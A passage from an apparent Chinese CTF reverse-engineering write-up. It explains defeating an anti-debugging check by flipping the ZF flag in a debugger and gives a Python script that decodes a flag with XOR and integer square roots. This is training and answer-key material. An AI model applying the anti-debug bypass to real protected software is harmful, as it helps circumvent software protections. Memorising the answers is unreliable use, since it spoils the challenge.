考察反调试
这里才是输出flag的地方
这里不输入1,且不在调试则可以输出flag。但是运行完会直接退出,所以进行调试,并修改ZF标志位进行跳转,让程序输出flag即可。
[Week3] 出题人已疯:
import libnum
string= ("你以为我还会在乎吗?\ud83d\ude2c\ud83d\ude2c\ud83d\ude2c我在昆仑山练了六年的剑\ud83d\ude1f\ud83d\ude1f\ud83d\ude1f我的心早就和昆仑山的雪一样冷了\ud83d\ude10\ud83d\ude10\ud83d\ude10我在大润发杀了十年的鱼\ud83d\ude2b\ud83d\ude2b\ud83d\ude2b我以为我的心早已跟我的刀一样冷了\ud83d\ude29\ud83d\ude29\ud83d\ude29"
"我早上坐公交滴卡的时候和司机大叔说“两个人”,司机惊讶地看着我“你明明就是一个人,为什么要滴两个人的卡?”我回他,“我心中还有一个叫Kengwang的。”司机回我说,“天使是不用收钱的。”"
"(尖叫)(扭曲)(阴暗的爬行)(扭动)(阴暗地蠕动)(翻滚)(激烈地爬动)(痉挛)(嘶吼)(蠕动)(阴森的低吼)(爬行)(分裂)(走上岸)(扭曲的行走)(不分对象攻击)"
"地球没我照样转?硬撑罢了!地球没我照样转?硬撑罢了!地球没我照样转?硬撑罢了!地球没我照样转?硬撑罢了!地球没我照样转?硬撑罢了!地球没我照样转?硬撑罢了!"
"扭曲上勾拳!阴暗的下勾拳!尖叫左勾拳!右勾拳爬行!扭动扫堂腿!分裂回旋踢!这是蜘蛛阴暗的吃耳屎,这是龙卷风翻滚停车场!乌鸦痉挛!老鼠嘶吼!大象蠕动!愤怒的章鱼!无差别攻击!无差别攻击!无差别攻击!")
enc=[24164, 27173, 32145, 17867, 40533, 21647, 17418, 30032, 27950, 62998,
60750, 64870, 52680, 61797, 49234, 59762, 16704, 19200, 32132, 24038,
21764, 30130, 28113, 23070, 27413, 27917, 28938, 50207, 64834, 60132,
64832, 63334, 55103, 22176, 21991, 20073, 22281, 19476, 28302, 24336,
24720, 19544, 23018, 43976]
flag=''
for i in range(len(enc)):
temp=enc[i]^i^ord(string[i%len(string)])
flag+=chr(libnum.nroot(temp,2))
print(flag)
扫一扫
578
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
